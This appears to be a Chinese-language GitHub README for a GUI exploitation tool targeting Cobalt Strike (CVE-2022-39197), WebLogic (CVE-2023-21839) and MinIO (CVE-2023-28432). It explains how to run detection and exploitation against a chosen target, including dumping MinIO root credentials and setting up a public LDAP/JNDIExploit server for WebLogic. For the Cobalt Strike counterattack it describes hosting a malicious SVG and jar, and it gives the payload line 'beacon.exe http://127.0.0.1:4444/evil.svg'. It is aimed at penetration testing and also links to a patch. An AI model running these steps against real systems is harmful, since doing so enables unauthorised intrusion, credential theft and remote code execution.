A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
对这三种漏洞的图形化漏洞检测和利用工具
1.运行jar需java8
2.针对单目标,不适用多ip漏扫
3.打包时weblogic漏洞利用需引用wlfullclient.jar,需自行添加
java -jar Gui-poc-test.jar
使用方法:有检测和利用两个按钮,漏洞不同的使用方法工具界面有提示
输入目标,无需输入端口,默认9000,可更改,见源码GuiDemo.java:line144
回显MINIO_ROOT_USER和MINIO_ROOT_PASSWORD等
![image](https://private-user-images.githubusercontent.com/55196564/287996332-42161c10-1acf-4866-92ae-19be85be5f14.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzk0ODAyODMsIm5iZiI6MTczOTQ3OTk4MywicGF0aCI6Ii81NTE5NjU2NC8yODc5OTYzMzItNDIxNjFjMTAtMWFjZi00ODY2LTkyYWUtMTliZTg1YmU1ZjE0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAyMTMlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMjEzVDIwNTMwM1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTJkMTZkYzNiOGE5YzNiYTE0MzMwYmQ4ZTZiMjdmY2E3ZjQxYjYyNWMyM2I5YjU0NmNkODk5YzJhNDI2MzhlY2UmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.J1RxuAsnfyZucON4ccJmUP2_eVe4dRyrzs3Dj2D8giM)
输入目标ip、端口、LDAP服务器地址
检测:
![image](https://private-user-images.githubusercontent.com/55196564/288132049-3a71f2d1-84c0-475b-b0c5-d962f567dbf9.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzk0ODAyODMsIm5iZiI6MTczOTQ3OTk4MywicGF0aCI6Ii81NTE5NjU2NC8yODgxMzIwNDktM2E3MWYyZDEtODRjMC00NzViLWIwYzUtZDk2MmY1NjdkYmY5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAyMTMlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMjEzVDIwNTMwM1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWE1YTdjNTI3YTZhZmFlYmU4ZGQwMzFhZTFkZjFmZWI2YjlmNGVmYjQ4NmY1N2Y2NDgxZDc2NzkxMDQzMzUyNzgmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.apQthzY7bc2UM4z17KBwOeiqNP9Y2DuGC02JvqLvOHk)
注意:漏洞利用需自行搭建ldap服务器(公网)
- jndi server利用工具:使用JNDIExploit.jar工具开启LDAP和WEB服务,参考https://github.com/WhiteHSBG/JNDIExploit
![image](https://private-user-images.githubusercontent.com/55196564/288135610-a7465773-f8df-4110-9f96-4d0a73b14bf0.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzk0ODAyODMsIm5iZiI6MTczOTQ3OTk4MywicGF0aCI6Ii81NTE5NjU2NC8yODgxMzU2MTAtYTc0NjU3NzMtZjhkZi00MTEwLTlmOTYtNGQwYTczYjE0YmYwLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAyMTMlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMjEzVDIwNTMwM1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTNmYjcxOTVmODJjNWI2ZWMwMGY0YWY1YTdkMjY2ZTAzMzc4ODBlYjYxOTAzOGMzMjcxNGJmNTNiZGI3YTI0ZTImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.m2NAC5Dl34ft1YsBcSAotzmIJtRW_rKFA2-qEI6anaE)
- 选择漏洞后默认显示自查漏洞的方法,在cs监听器输入检测代码可自测漏洞是否存在
- 漏洞利用前提:本地已获取到对方木马(exe)
- 运行环境要求:win,python3,pip3安装frida-tools
- python已加入环境变量
- 自行搭建服务器放置svg文件,jar包,对方能访问
- 输入exe绝对路径和svg地址,空格隔开,点击执行实现反制
- jar包内容自行设置,演示内容为弹出计算器
- 默认木马名为beacon,可修改,见源码cve_2022_39197.py:line28
payload示例:
beacon.exe http://127.0.0.1:4444/evil.svg
实现结果:win运行马,mac上的cs客户端上线
同时cs端执行jar包内容,弹出计算器
![image](https://private-user-images.githubusercontent.com/55196564/288147155-30a827a6-a6e4-475e-8eba-54b208d67641.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzk0ODAyODMsIm5iZiI6MTczOTQ3OTk4MywicGF0aCI6Ii81NTE5NjU2NC8yODgxNDcxNTUtMzBhODI3YTYtYTZlNC00NzVlLThlYmEtNTRiMjA4ZDY3NjQxLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAyMTMlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMjEzVDIwNTMwM1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTMyNjJiMGU0MmMwNTk4NzVmNTNiYzJiZmQ4ZGM1ZWYzMGQzMTdiNzFlZmNkM2RhZTFmMmQ0ZDU3ODdhYjFiM2UmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.mbucqwxOHAcscGpNRmrUQxiT50YiYLCvEa0kAEI3Rtc)
win记录到cs访问地址
![image](https://private-user-images.githubusercontent.com/55196564/288145249-a96832d6-eb2a-4d77-b652-8078fa685411.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzk0ODAyODMsIm5iZiI6MTczOTQ3OTk4MywicGF0aCI6Ii81NTE5NjU2NC8yODgxNDUyNDktYTk2ODMyZDYtZWIyYS00ZDc3LWI2NTItODA3OGZhNjg1NDExLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAyMTMlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMjEzVDIwNTMwM1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTcwMjkxZTdmOWI0ODg2OTYwMzI5MmMyNTY3MTdhMWMwMzFlNTk2NDMxODFlNjJjYjIyOTAwZTFiZWY0OGMxZmQmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.1NdgC5FbirNYPT1n5N7poJiWtLOt4QgLNuLsYevBmxI)
原理:https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md
https://github.com/4ra1n/CVE-2023-21839
https://github.com/DXask88MA/Weblogic-CVE-2023-21839
https://github.com/its-arun/CVE-2022-39197
cs补丁:https://github.com/burpheart/CVE-2022-39197-patch